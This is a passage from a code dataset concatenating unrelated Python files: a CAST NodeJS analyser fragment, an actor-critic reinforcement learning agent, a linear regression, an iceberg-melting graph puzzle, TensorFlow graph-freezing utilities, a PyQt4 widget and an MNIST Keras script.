marklogicDatabase.connectionParameter\n \n if not marklogicDatabase_object:\n\n marklogicDatabase_object = cast.analysers.CustomObject()\n marklogicDatabase.kb_symbol = marklogicDatabase_object\n \n marklogicDatabase_object.set_name(marklogicDatabase.name)\n marklogicDatabase_object.set_parent(jsContent.get_kb_object())\n fullname = ast.get_file().get_path() + '/CAST_NodeJS_Marklogic_Database/' + marklogicDatabase.name\n displayfullname = ast.get_file().get_path() + '.CAST_NodeJS_Marklogic_Database.' 
+ marklogicDatabase.name\n if not fullname in guids:\n guids[fullname] = 1\n else:\n guids[fullname] = guids[fullname] + 1\n fullname += ('_' + str(guids[fullname]))\n \n log.info('create marklogic database ' + fullname)\n \n marklogicDatabase_object.set_fullname(displayfullname)\n marklogicDatabase_object.set_guid(fullname)\n marklogicDatabase_object.set_type('CAST_NodeJS_Marklogic_Database')\n marklogicDatabase_object.save()\n marklogicDatabase_object.save_position(ast.create_bookmark(marklogicDatabase.connectionParameter.get_file()))\n marklogicDatabase_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n self.nbMarklogicDatabases += 1\n \n collections = {}\n \n for collection in marklogicDatabase.collections.keys():\n kbObject = self.create_marklogic_collection(collection, marklogicDatabase, jsContent, guids)\n collections[collection] = kbObject\n\n for suspLink in marklogicDatabase.linksToCollections:\n try:\n if suspLink.callee:\n create_link_nodeJS(suspLink.linkType, suspLink.caller, collections[suspLink.callee], suspLink.callPart.create_bookmark(jsContent.file))\n else:\n create_link_nodeJS(suspLink.linkType, suspLink.caller, marklogicDatabase_object, suspLink.callPart.create_bookmark(jsContent.file))\n except:\n pass\n\n def create_marklogic_collection(self, param, marklogicDatabase, jsContent, guids):\n \n evs = self.evaluate_nosql_name(param)\n\n if evs:\n for n in evs:\n \n if n.startswith('/'):\n name = n[1:]\n else:\n name = n\n\n if marklogicDatabase.referencedDatabase and name in marklogicDatabase.referencedDatabase.collectionsByName:\n return marklogicDatabase.referencedDatabase.collectionsByName[name]\n if name in marklogicDatabase.collectionsByName:\n return marklogicDatabase.collectionsByName[name]\n \n marklogicCollection_object = cast.analysers.CustomObject()\n if marklogicDatabase.referencedDatabase:\n marklogicDatabase.referencedDatabase.add_collection_by_name(name, marklogicCollection_object)\n else:\n marklogicDatabase.add_collection_by_name(name, marklogicCollection_object)\n \n marklogicCollection_object.set_name(name)\n marklogicCollection_object.set_parent(marklogicDatabase.kb_symbol)\n# fullname = marklogicDatabase.kb_symbol.fullname + '/' + name\n fullname = jsContent.file.get_path() + '/CAST_NodeJS_Marklogic_Collection/' + name\n displayfullname = jsContent.file.get_path() + '.CAST_NodeJS_Marklogic_Collection.' 
+ name\n \n log.info('create marklogic collection ' + fullname)\n \n if not fullname in guids:\n guids[fullname] = 1\n else:\n guids[fullname] = guids[fullname] + 1\n fullname += ('_' + str(guids[fullname]))\n \n marklogicCollection_object.set_fullname(displayfullname)\n marklogicCollection_object.set_guid(fullname)\n marklogicCollection_object.set_type('CAST_NodeJS_Marklogic_Collection')\n marklogicCollection_object.save()\n try:\n marklogicCollection_object.save_position(marklogicDatabase.collections[param].create_bookmark(jsContent.file))\n except:\n pass\n marklogicDatabase.set_collection_kb_object(param, marklogicCollection_object)\n \n self.nbMarklogicCollections += 1\n \n return marklogicCollection_object\n\n def create_couchdb_database(self, couchdbDatabase, jsContent, guids, couchDBByName):\n \n names = self.evaluate_nosql_name(couchdbDatabase.name)\n for name in names:\n \n if name in couchDBByName:\n for suspLink in couchdbDatabase.linksToDatabase:\n try:\n create_link_nodeJS(suspLink.linkType, suspLink.caller, couchdbDatabase.kb_symbol, suspLink.callPart.create_bookmark(jsContent.file))\n except:\n pass\n continue\n \n couchDBByName[name] = couchdbDatabase\n \n ast = couchdbDatabase.ast\n \n couchdbDatabase_object = cast.analysers.CustomObject()\n couchdbDatabase.kb_symbol = couchdbDatabase_object\n \n couchdbDatabase_object.set_name(name)\n couchdbDatabase_object.set_parent(jsContent.get_kb_object())\n fullname = jsContent.file.get_path() + '/CAST_NodeJS_CouchDB_Database/' + name\n displayfullname = jsContent.file.get_path() + '.CAST_NodeJS_CouchDB_Database.' + name\n if not fullname in guids:\n guids[fullname] = 1\n else:\n guids[fullname] = guids[fullname] + 1\n fullname += ('_' + str(guids[fullname]))\n \n log.info('create CouchDB database ' + fullname)\n \n couchdbDatabase_object.set_fullname(displayfullname)\n couchdbDatabase_object.set_guid(fullname)\n couchdbDatabase_object.set_type('CAST_NodeJS_CouchDB_Database')\n couchdbDatabase_object.save()\n couchdbDatabase_object.save_position(ast.create_bookmark(jsContent.file))\n couchdbDatabase_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n self.nbCouchDBDatabases += 1\n \n for suspLink in couchdbDatabase.linksToDatabase:\n try:\n create_link_nodeJS(suspLink.linkType, suspLink.caller, couchdbDatabase_object, suspLink.callPart.create_bookmark(jsContent.file))\n except:\n pass\n\n def create_couchdb_call(self, couchdbCall, couchDBDatabasesByName, jsContent):\n \n dbNames = couchdbCall.variableName.evaluate()\n if dbNames:\n for name in dbNames:\n if name in couchDBDatabasesByName:\n db = couchDBDatabasesByName[name]\n try:\n create_link_nodeJS(couchdbCall.linkType, couchdbCall.caller, db.kb_symbol, couchdbCall.ast.create_bookmark(jsContent.file))\n except:\n pass\n \n def create_database_accesses(self, dbConnection):\n\n for linkSuspension in dbConnection.linkSuspensions:\n callee = linkSuspension.callee\n if isinstance(callee, str):\n calleeName = callee.upper()\n if calleeName in self.unknownTablesByName:\n callee = self.unknownTablesByName[calleeName]\n else:\n callee = cast.analysers.CustomObject()\n self.unknownTablesByName[calleeName] = callee\n callee.set_name(calleeName)\n# Due to a bug in the framework, we can not create an object whose parent is a project anymore\n# callee.set_parent(self.currentFile.get_project())\n callee.set_parent(self.currentFile)\n fullname = self.currentFile.get_project().get_fullname() + '/CAST_NodeJS_Unknown_Database_Table/' + calleeName\n displayfullname = 
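# --- Aside: the database bookkeeping above (couchDBByName, the marklogic
# connection-parameter map) follows one create-or-reuse pattern: the first
# caller builds the object, later callers get the cached one. A standalone
# sketch:
class Registry:
    def __init__(self):
        self._by_name = {}

    def get_or_create(self, name, factory):
        if name not in self._by_name:
            self._by_name[name] = factory(name)
        return self._by_name[name]

registry = Registry()
first = registry.get_or_create('inventory', lambda n: {'name': n})
second = registry.get_or_create('inventory', lambda n: {'name': n})
assert first is second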
self.currentFile.get_project().get_fullname() + '.CAST_NodeJS_Unknown_Database_Table.' + calleeName\n callee.set_fullname(displayfullname)\n callee.set_guid(fullname)\n callee.set_type('CAST_NodeJS_Unknown_Database_Table')\n callee.save()\n create_link('parentLink', callee, self.currentFile.get_project())\n \n log.debug('create_unresolved table ' + calleeName)\n if callee:\n self.nbDbAccesses += 1\n if linkSuspension.caller:\n create_link_nodeJS(linkSuspension.linkType, linkSuspension.caller, callee, linkSuspension.callPart.create_bookmark(self.currentFile))\n else:\n create_link_nodeJS(linkSuspension.linkType, self.currentSourceCode, callee, linkSuspension.callPart.create_bookmark(self.currentFile))\n\n# self.type = type\n# self.uri = uri\n# self.handler = handler\n# self.ast = ast\n# self.kbObject = None\n def create_http_request(self, httpRequest, uri = None):\n \n if uri == None:\n uris = httpRequest.get_uri_evaluation()\n if type(uris) is list:\n for uri in uris:\n self.create_http_request(httpRequest, uri)\n return\n _uri = uris\n else:\n _uri = uri\n\n if httpRequest.type == 'GET':\n objectType = 'CAST_NodeJS_GetHttpRequestService'\n elif httpRequest.type == 'POST':\n objectType = 'CAST_NodeJS_PostHttpRequestService'\n elif httpRequest.type == 'PUT':\n objectType = 'CAST_NodeJS_PutHttpRequestService'\n elif httpRequest.type == 'DELETE':\n objectType = 'CAST_NodeJS_DeleteHttpRequestService'\n else:\n objectType = 'CAST_NodeJS_GetHttpRequestService'\n \n obj = cast.analysers.CustomObject()\n name = get_short_uri(_uri)\n obj.set_name(name)\n obj.set_type(objectType)\n obj.set_parent(self.currentSourceCode)\n fullname = httpRequest.caller.get_kb_symbol().get_kb_fullname() + '/' + objectType + '/' + name\n displayfullname = httpRequest.caller.get_kb_symbol().get_display_fullname() + '.' + httpRequest.type.lower() + '.' 
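# --- Aside: the if/elif verb dispatch in create_http_request is a fixed
# mapping with a GET fallback; restated as a dict lookup (the type names are
# taken from the code above):
OBJECT_TYPES = {
    'GET': 'CAST_NodeJS_GetHttpRequestService',
    'POST': 'CAST_NodeJS_PostHttpRequestService',
    'PUT': 'CAST_NodeJS_PutHttpRequestService',
    'DELETE': 'CAST_NodeJS_DeleteHttpRequestService',
}

def object_type_for(verb):
    return OBJECT_TYPES.get(verb, OBJECT_TYPES['GET'])

print(object_type_for('PATCH'))  # CAST_NodeJS_GetHttpRequestService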
+ name\n n = 0\n if fullname in self.httpRequestGuids:\n n = self.httpRequestGuids[fullname] + 1\n finalFullname = fullname + '_' + str(n)\n else:\n finalFullname = fullname\n self.httpRequestGuids[fullname] = n\n obj.set_guid(finalFullname)\n obj.set_fullname(displayfullname)\n obj.save()\n obj.save_property('CAST_ResourceService.uri', _uri)\n crc = httpRequest.ast.tokens[0].get_code_only_crc()\n obj.save_property('checksum.CodeOnlyChecksum', crc)\n obj.save_position(httpRequest.ast.create_bookmark(self.currentFile))\n \n create_link_nodeJS('callLink', httpRequest.caller, obj)\n \n if httpRequest.handler:\n create_link_nodeJS('callLink', obj, httpRequest.handler.get_kb_object())\n \n for onFunction in httpRequest.onFunctions:\n create_link_nodeJS('callLink', obj, onFunction.get_kb_object())\n \n def create_application(self, jsContent):\n\n log.info('NodejS application found ' + self.currentFile.get_path())\n self.nbApplications += 1\n \n app = cast.analysers.CustomObject()\n name = self.currentSourceCode.name[:-3]\n app.set_name(name)\n app.set_type('CAST_NodeJS_Application')\n app.set_parent(self.currentFile)\n fullname = self.currentFile.get_path() + '/CAST_NodeJS_Application'\n displayfullname = self.currentFile.get_path() + '.CAST_NodeJS_Application'\n app.set_guid(fullname)\n app.set_fullname(displayfullname)\n app.save()\n crc = jsContent.objectDatabaseProperties.checksum\n app.save_property('checksum.CodeOnlyChecksum', crc)\n app.save_position(jsContent.create_bookmark(self.currentFile))\n \n create_link_nodeJS('relyonLink', app, self.currentSourceCode)\n \n return app\n\n def create_loopback_server(self, jsContent):\n\n dirname = os.path.dirname(self.currentFile.get_path())\n\n log.info('NodejS loopback server found ' + self.currentFile.get_path())\n app = self.create_application(jsContent)\n\n if dirname in self.loopback_analysis.loopbackApplications:\n appli = self.loopback_analysis.loopbackApplications[dirname]\n appli.kbObject = app\n for model in appli.models.values():\n if 'kbObject' in model:\n create_link_nodeJS('referLink', appli, model['kbObject'])\n \n else:\n log.warning('model found in model-config is not defined: ' + str(model['name']))\n \n def create_external_library(self, name, ast, externalLibrariesFunctionCalls=[], externalLibrariesMethodCalls=[]):\n \n parentFullname = 'NodeJS.externalLibrary'\n if not self.externalLibrariesParent:\n self.externalLibrariesParent = cast.analysers.CustomObject()\n self.externalLibrariesParent.set_name('NodeJS Standard library')\n self.externalLibrariesParent.set_type('CAST_NodeJS_External_Library')\n self.externalLibrariesParent.set_parent(self.currentFile.get_project())\n self.externalLibrariesParent.set_guid(parentFullname)\n self.externalLibrariesParent.set_external()\n self.externalLibrariesParent.set_fullname(parentFullname)\n self.externalLibrariesParent.save()\n \n if name in self.externalLibraries:\n extLib = self.externalLibraries[name]\n obj = extLib.kbObject\n else:\n extLib = ExternalLibrary(name)\n extLib.create_objects(self.externalLibrariesParent, parentFullname)\n self.externalLibraries[name] = extLib\n obj = extLib.kbObject\n create_link_nodeJS('useLink', self.currentSourceCode, obj, ast.create_bookmark(self.currentFile))\n \n for linkSusp in externalLibrariesFunctionCalls:\n func = extLib.get_kb_function(linkSusp.callPart.get_identifier().get_name())\n if func:\n create_link_nodeJS('callLink', linkSusp.caller, func, linkSusp.callPart.create_bookmark(self.currentFile))\n \n for linkSusp in 
externalLibrariesMethodCalls:\n            createClassMethod = linkSusp.infos['createClassMethod']\n            try:\n                className = ExternalLibrary.functionReturnsClassByLibName[extLib.name][createClassMethod]\n                meth = extLib.get_kb_method(className, linkSusp.callPart.get_identifier().get_name())\n                if meth:\n                    create_link_nodeJS('callLink', linkSusp.caller, meth, linkSusp.callPart.create_bookmark(self.currentFile))\n            except:\n                log.debug('Internal issue when creating link to external method: ' + str(traceback.format_exc()))\n        \n        \n","sub_path":"analyze/extensions/com.castsoftware.nodejs.2.0.2-funcrel/analyser.py","file_name":"analyser.py","file_ext":"py","file_size_in_byte":53357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503900222","text":"import torch\nimport torch.optim as optim\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.distributions.categorical import Categorical\n\nfrom ActorCritic.Models.Actor_Critic_Net import ActorCriticNet\nfrom Utils.env_util import get_env_space\n\n\nclass ActorCritic:\n    def __init__(self,\n                 num_states,\n                 num_actions,\n                 learning_rate=0.002,\n                 gamma=0.995,\n                 eps=torch.finfo(torch.float32).eps,\n                 enable_gpu=False\n                 ):\n\n        if enable_gpu:\n            self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n        else:\n            self.device = torch.device(\"cpu\")\n\n        self.actor_critic = ActorCriticNet(num_states, num_actions).to(self.device)\n\n        self.optimizer = optim.Adam(self.actor_critic.parameters(), lr=learning_rate)\n\n        self.gamma = gamma\n        self.eps = eps\n\n        self.values = [] # value estimate for the state at each time step\n        self.rewards = [] # immediate reward r_t at each time step\n        self.log_probs = [] # log probability of the chosen action at each time step\n        self.cum_rewards = [] # cumulative (discounted) return G_t at each time step\n\n    def calc_cumulative_rewards(self):\n        R = 0.0\n        for r in self.rewards[::-1]:\n            R = r + self.gamma * R\n            self.cum_rewards.insert(0, R)\n\n    def choose_action(self, state):\n        state = torch.tensor(state).unsqueeze(0).to(self.device).float()\n        probs, value = self.actor_critic(state)\n\n        # sample an action and compute its log probability\n        m = Categorical(probs)\n        action = m.sample()\n        log_prob = m.log_prob(action)\n\n        self.log_probs.append(log_prob)\n        self.values.append(value)\n\n        return action.item()\n\n    def learn(self):\n        self.calc_cumulative_rewards()\n        assert len(self.cum_rewards) == len(self.values)\n\n        rewards = torch.tensor(self.cum_rewards).unsqueeze(-1).to(self.device)\n        values = torch.stack(self.values).squeeze(-1)\n        log_probs = torch.stack(self.log_probs)\n\n        rewards = (rewards - rewards.mean()) / (rewards.std() + self.eps)\n        advances = rewards - values\n\n        # detach the advantage in the policy term so actor gradients do not flow into the critic\n        loss = -(log_probs * advances.detach()).mean() + advances.pow(2).mean()\n\n        self.optimizer.zero_grad()\n        loss.backward()\n        self.optimizer.step()\n\n        # clear the episode buffers\n        self.rewards.clear()\n        self.log_probs.clear()\n        self.cum_rewards.clear()\n        self.values.clear()\n\n\nif __name__ == '__main__':\n    env_id = 'MountainCar-v0'\n    alg_id = 'ActorCritic'\n    env, num_states, num_actions = get_env_space(env_id)\n\n    agent = ActorCritic(num_states, num_actions, enable_gpu=True)\n    episodes = 400\n\n    writer = SummaryWriter()\n\n    # iterate over all episodes and sample\n    for i in range(episodes):\n        # start of the current episode\n        state = env.reset()\n        episode_reward = 0\n\n        for t in range(8000):\n            env.render()\n            action = agent.choose_action(state)\n            state, reward, done, info = env.step(action)\n\n            episode_reward += reward\n            agent.rewards.append(reward)\n\n            # end of the current episode\n            if done:\n                writer.add_scalar(alg_id, episode_reward, i)\n                print(\"episode: {} , the episode 
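# --- Aside: calc_cumulative_rewards above implements the backward recursion
# G_t = r_t + gamma * G_{t+1}; a dependency-free check with toy numbers:
gamma = 0.9
rewards = [1.0, 0.0, 2.0]

G, returns = 0.0, []
for r in reversed(rewards):
    G = r + gamma * G
    returns.insert(0, G)

print(returns)  # [2.62, 1.8, 2.0]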
reward is {}\".format(i, round(episode_reward, 3)))\n                break\n\n        agent.learn()\n\n    env.close()\n","sub_path":"ActorCritic/Actor_Critic.py","file_name":"Actor_Critic.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"525902434","text":"\"\"\"\nWorthy CLI app.\n\"\"\"\n\n# import pandas as pd\n\n\ndef decorate(s:str) -> None:\n\tprint('')\n\tprint(s)\n\tfor _ in range(len(s)):\n\t\tprint('-', end='')\n\tprint('\\n')\n\n\ngreeting = 'Welcome to Worthy CLI:'\ndecorate(greeting)\n\n\n\nwhile True:\n\tcmd = input('$>')\n\tcmd = cmd.lower()\n\tif cmd == 'exit':\n\t\tbreak\n\n\nprint('---\\nTerminated successfully.\\n')\n# EOA\n","sub_path":"worthy.py","file_name":"worthy.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"195671307","text":"import numpy as np\n\nnp.random.seed(23)\n\n# implements linear regression with stochastic gradient descent\nclass linear_regr(object):\n\n    def __init__(self, learning_rate=0.0001, batch_size=5, training_iters=50):\n        self.learning_rate = learning_rate\n        self.training_iters = training_iters\n        self.batch_size = batch_size\n\n    def fit(self, X_train, y_train, plot=False):\n\n        # format the data (ensure 2-D, then prepend a bias column)\n        X = X_train.values\n        if len(X.shape) < 2:\n            X = X.reshape(-1,1)\n        X = np.insert(X, 0, 1, 1)\n\n        # initialize the parameters with small random values\n        # (our reasonable initial guess)\n        self.w_hat = np.random.normal(0,5, size = X[0].shape)\n\n        for i in range(self.training_iters):\n\n            # build the mini-batches\n            offset = (i * self.batch_size) % (y_train.shape[0] - self.batch_size)\n            batch_X = X[offset:(offset + self.batch_size), :]\n            batch_y = y_train[offset:(offset + self.batch_size)]\n\n            gradient = np.zeros(self.w_hat.shape) # initialize the gradient\n\n            # accumulate the gradient from the points in the batch\n            for point, yi in zip(batch_X, batch_y):\n                gradient += (point * self.w_hat - yi) * point\n\n            gradient *= self.learning_rate\n            self.w_hat -= gradient\n\n    def predict(self, X_test):\n        # format the data (ensure 2-D, then prepend a bias column)\n        X = X_test.values\n        if len(X.shape) < 2:\n            X = X.reshape(-1,1)\n        X = np.insert(X, 0, 1, 1)\n\n        return np.dot(X, self.w_hat)\n\nregr = linear_regr(learning_rate=0.0003, training_iters=40)\nregr.fit(dados['x'], dados['y'])\n","sub_path":"Graddesc_Estoc.py","file_name":"Graddesc_Estoc.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547489960","text":"# Iceberg\nimport sys\nfrom collections import deque\n\nR, C = map(int,sys.stdin.readline().split())\nA= []\nfor i in range(R):\n    A.append(list(map(int,sys.stdin.readline().split())))\n\ndr = [0,1,0,-1]\ndc = [1,0,-1,0]\nhour = 0\ndef sol():\n    global hour\n    while(1):\n        vis=[[0 for _ in range(C)] for _ in range(R)] \n        stack = deque()\n        cnt = 0\n        vis_cnt = 0\n        for i in range(1,R-1):\n            for j in range(1,C-1):\n                if A[i][j] > 0:\n                    cnt +=1\n                    if len(stack) == 0:\n                        stack.append([i,j])\n                        vis[i][j] = 1\n        if len(stack) > 0:\n            while(1):\n                cur = stack.pop()\n                vis_cnt +=1\n                for i in range(4):\n                    cr = cur[0] + dr[i]\n                    cc = cur[1] + dc[i]\n                    if cr < 0 or cr >= R or cc < 0 or cc >= C: continue\n                    if vis[cr][cc] == 1 : continue\n                    # if A[cr][cc] == 0 and A[cur[0]][cur[1]]>0:\n                    if A[cr][cc] == 0:\n                        if A[cur[0]][cur[1]] > 0:\n                            A[cur[0]][cur[1]] -= 1\n                        continue\n\n                    vis[cr][cc] =1\n                    stack.append([cr,cc])\n                if len(stack) == 0:\n                    break\n\n        hour+=1\n\n        if cnt == 0:\n            
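# --- Aside: the update in linear_regr.fit above is stochastic gradient
# descent on squared error, where each point contributes (x.w - y) * x; a
# vectorized standalone check on synthetic data (all names here are
# illustrative):
import numpy as np

rng = np.random.default_rng(0)
X = np.c_[np.ones(50), rng.normal(size=50)]   # bias column + one feature
y = 3.0 + 2.0 * X[:, 1]                       # true weights [3, 2]
w = rng.normal(size=2)

for _ in range(2000):
    idx = rng.integers(0, len(X), size=5)     # mini-batch of 5 points
    grad = ((X[idx] @ w - y[idx]) @ X[idx]) / len(idx)
    w -= 0.05 * grad

print(np.round(w, 2))  # approximately [3. 2.]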
print(0)\n break\n\n elif cnt > vis_cnt:\n print(hour-1)\n break\n\nsol()\n","sub_path":"Python/3주차_BFS,DFS/정글_3_2573.py","file_name":"정글_3_2573.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454863077","text":"from typing import Iterable\n\nimport tensorflow as tf\nfrom tensorflow.tools.graph_transforms import TransformGraph\n\nfrom nets.transformationnet import TransformationNet\n\n\ndef load_model_from_ckpt(sess: tf.Session,\n model_path: str) -> tf.Session:\n \"\"\"\n Load model from checkpoint.\n :param sess: Active TensorFlow session.\n :param model_path: model checkpoint path.\n :return: Active TensorFlow session containing the variables.\n \"\"\"\n\n saver = tf.train.import_meta_graph(model_path + '.meta', clear_devices=True)\n saver.restore(sess, model_path)\n\n return sess\n\n\ndef freeze_graph(sess: tf.Session,\n output_node_name: str) -> tf.Graph:\n \"\"\"\n Extract the sub graph defined by the output nodes and convert\n all its variables into constant\n :param sess: Active TensorFlow session containing the variables.\n :param output_node_name: name of the result node in the graph.\n :return: GraphDef containing a simplified version of the original.\n \"\"\"\n\n output_graph_def = tf.graph_util.convert_variables_to_constants(\n sess=sess,\n input_graph_def=tf.get_default_graph().as_graph_def(),\n output_node_names=[output_node_name]\n )\n\n return output_graph_def\n\n\ndef optimize_graphdef(input_graph_def: tf.GraphDef,\n input_node_name: str,\n output_node_name: str) -> tf.GraphDef:\n \"\"\"\n Optimize input GraphDef.\n :param input_graph_def: GraphDef containing a network.\n :param input_node_name: GraphDef input node name.\n :param output_node_name: GraphDef output node name.\n :return: GraphDef containing a optimized version of the original.\n \"\"\"\n\n optimized_graph_def = TransformGraph(\n input_graph_def=input_graph_def,\n inputs=[input_node_name],\n outputs=[output_node_name],\n transforms=[\"merge_duplicate_nodes\",\n \"strip_unused_nodes\",\n \"remove_device\",\n \"fold_constants\",\n \"flatten_atrous_conv\",\n \"fold_batch_norms\",\n \"fold_old_batch_norms\",\n \"fuse_pad_and_conv\",\n \"fuse_resize_pad_and_conv\",\n \"sort_by_execution_order\"]\n )\n\n return optimized_graph_def\n\n\n# TODO: move to networks folder.\ndef create_transformation_network(\n sess: tf.Session,\n model_ckpt_path: str,\n input_node_name: str,\n desired_input_shape: Iterable[int]) -> tf.Graph:\n \"\"\"\n Create transformation network from checkpoint.\n :param sess: Active TensorFlow session.\n :param model_ckpt_path: path where model checkpoint are stored.\n :param input_node_name: model input node name.\n :param desired_input_shape: transformation input shape.\n :return: tf.Graph with loaded model.\n \"\"\"\n img_placeholder = tf.placeholder(tf.float32,\n shape=desired_input_shape,\n name=input_node_name)\n\n transformation_network = TransformationNet()\n transformation_network.build_transformation_net(img_placeholder)\n\n saver = tf.train.Saver()\n try:\n saver.restore(sess, model_ckpt_path)\n except:\n raise RuntimeError('Something wrong with checkpoint. 
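# --- Aside: a hedged end-to-end usage sketch of the helpers above (TF1-style
# graph mode, as in this module). The checkpoint path and node names are
# placeholders, and running it requires an existing checkpoint:
import tensorflow as tf

with tf.Session() as sess:
    sess = load_model_from_ckpt(sess, 'checkpoints/model')            # restore variables
    frozen = freeze_graph(sess, output_node_name='output')            # variables -> constants
    optimized = optimize_graphdef(frozen, 'input', 'output')          # apply graph transforms
    tf.io.write_graph(optimized, 'export', 'frozen.pb', as_text=False)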
'\n 'Check checkpoint path.')\n\n return sess.graph\n","sub_path":"utils/graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"393484940","text":"#!/usr/bin/env python\n#country.py\n#Daphne Groot\n\nfrom PyQt4 import QtGui\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport sys\n\nclass Country(QtGui.QWidget):\n\tdef __init__(self):\n\t\tsuper(Country, self).__init__()\n\t\tself.initUI()\n\t\t\n\t\t\n\tdef initUI(self):\n\t\t\"\"\" Maakt de combobox en voegt de gegevens eraan toe.\n\t\tOok worden de connecties gemaakt naar de methode om de gegevens te updaten\"\"\"\n\t\t\n\t\tlanden = self.getCountry()\n\t\t\n\t\t#Combobox \"landennaam\"\n\t\tself.comboboxLand = QtGui.QComboBox(self)\n\t\tself.comboboxLand.addItems(landen)\n\t\tself.comboboxLand.adjustSize()\n\t\tself.comboboxLand.move(40, 30)\n\t\t\n\t\t#Connecties voor aanpassen aan nieuwe gegevens\n\t\tself.connect(self.comboboxLand,SIGNAL(\"currentIndexChanged(int)\"), self.updateUi)\n\t\t\n\t\t\n\tdef updateUi(self):\n\t\t\"\"\" Zorgt ervoor dat de gegevens in de combobox geupdate zijn \"\"\"\n\t\t#Aanpassen aan nieuwe gegevens\n\t\tlandnaam = str(self.comboboxLand.currentText())\n\t\t\n\t\tself.__str__(landnaam)\n\t\t\n\t\t\n\tdef getCountry(self):\n\t\t\"\"\" Haalt de landen namen op uit het bestand landennamen.txt \"\"\"\n\t\t#Landen namen uit bestand halen\n\t\tself.landen = []\n\t\twith open('landennamen.txt', 'r') as in_f:\n\t\t\tfor line in in_f:\n\t\t\t\tself.landen.append(line[:-1])\n\t\t\t\t\n\t\treturn self.landen\n\n\n\tdef __str__(self,landnaam):\n\t\t\"\"\"Een berichtje gevolgd door het gekozen land wordt geprint\"\"\" \n\t\tprint(\"Hello from \" + landnaam)\n\t\n\t\ndef main():\n\t\n\tapp = QtGui.QApplication(sys.argv)\n\tLandennaam = Country()\n\tLandennaam.setWindowTitle('Landennaam')\n\tLandennaam.setGeometry(300, 300, 300, 100)\n\tLandennaam.show()\n\tsys.exit(app.exec_())\n\n\t\n\t\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457511564","text":"import matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport time\r\nimport os #импортирање на оперативниот систем\r\nimport keras as keras\r\nfrom keras import backend as K\r\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\r\nfrom keras.models import Sequential\r\nfrom datetime import timedelta\r\n\r\n\r\nstart = time.time()\r\n\r\nprint('Вчитување на податоците....')\r\n\r\ntrain_file = './mnist_train.csv'\r\ntest_file = './mnist_test.csv'\r\n\r\ntrainSet = np.loadtxt(train_file, delimiter=',')\r\ntestSet = np.loadtxt(test_file, delimiter=',')\r\n\r\ntrain_data = trainSet[:, 1:785]\r\ntrain_labels = trainSet[:, :1]\r\n\r\ntest_data = testSet[:, 1:785]\r\ntest_labels = testSet[:, :1]\r\n\r\ndef one_hot(data):\r\n one_hot = []\r\n for item in data:\r\n if item == 0:\r\n one_h = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n elif item == 1:\r\n one_h = [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\r\n elif item == 2:\r\n one_h = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\r\n elif item == 3:\r\n one_h = [0, 0, 0, 1, 0, 0, 0, 0, 0, 0]\r\n elif item == 4:\r\n one_h = [0, 0, 0, 0, 1, 0, 0, 0, 0, 0]\r\n elif item == 5:\r\n one_h = [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]\r\n elif item == 6:\r\n one_h = [0, 0, 0, 0, 0, 0, 1, 0, 0, 0]\r\n elif 
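# --- Aside: the ten-branch one_hot chain above can be written as a single
# indexing operation; a standalone equivalent:
import numpy as np

labels = np.array([3.0, 0.0, 9.0])
one_hot = np.eye(10)[labels.astype(int)]
print(one_hot[0])  # [0. 0. 0. 1. 0. 0. 0. 0. 0. 0.]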
\r\n\r\ndef plot_images(images, trueClass, ensembleClassPrediction=None, bestClassPrediction=None):\r\n    fig, axes = plt.subplots(3, 3)\r\n    if ensembleClassPrediction is None:\r\n        hspace = 0.3\r\n    else:\r\n        hspace = 1.0\r\n    fig.subplots_adjust(hspace=hspace, wspace=0.3)\r\n\r\n    for i, ax in enumerate(axes.flat):\r\n        if i < len(images):\r\n            ax.imshow(images[i, :, :], cmap='gray')\r\n            if ensembleClassPrediction is None:\r\n                label = \"True class: {0}\".format(int(trueClass[i]))\r\n            else:\r\n                msg = \"True class: {0}\\nNetwork ensemble: {1}\\nBest network: {2}\"\r\n                label = msg.format(format(int(trueClass[i])),\r\n                                   ensembleClassPrediction[i],\r\n                                   bestClassPrediction[i])\r\n            ax.set_xlabel(label)\r\n            ax.set_xticks([])\r\n            ax.set_yticks([])\r\n    plt.show()\r\n\r\n\r\nimg_rows, img_cols = 28, 28\r\ntrain_images = train_data.reshape(train_data.shape[0], img_rows, img_cols)\r\ntest_images = test_data.reshape(test_data.shape[0], img_rows, img_cols)\r\n#plot_images(train_images[0:9], train_labels[0:9])\r\n\r\n\r\nif K.image_data_format() == 'channels_first':\r\n    train_images = train_images.reshape(train_images.shape[0], 1, img_rows, img_cols)  # train_images.shape[0] 60000\r\n    test_images = test_images.reshape(test_images.shape[0], 1, img_rows, img_cols)  # test_images.shape[0] 10000\r\n    input_shape = (1, img_rows, img_cols)\r\nelse:\r\n    train_images = train_images.reshape(train_images.shape[0], img_rows, img_cols, 1)\r\n    test_images = test_images.reshape(test_images.shape[0], img_rows, img_cols, 1)\r\n    input_shape = (img_rows, img_cols, 1)\r\n\r\n# Convert the type of the pixel values from whole numbers to 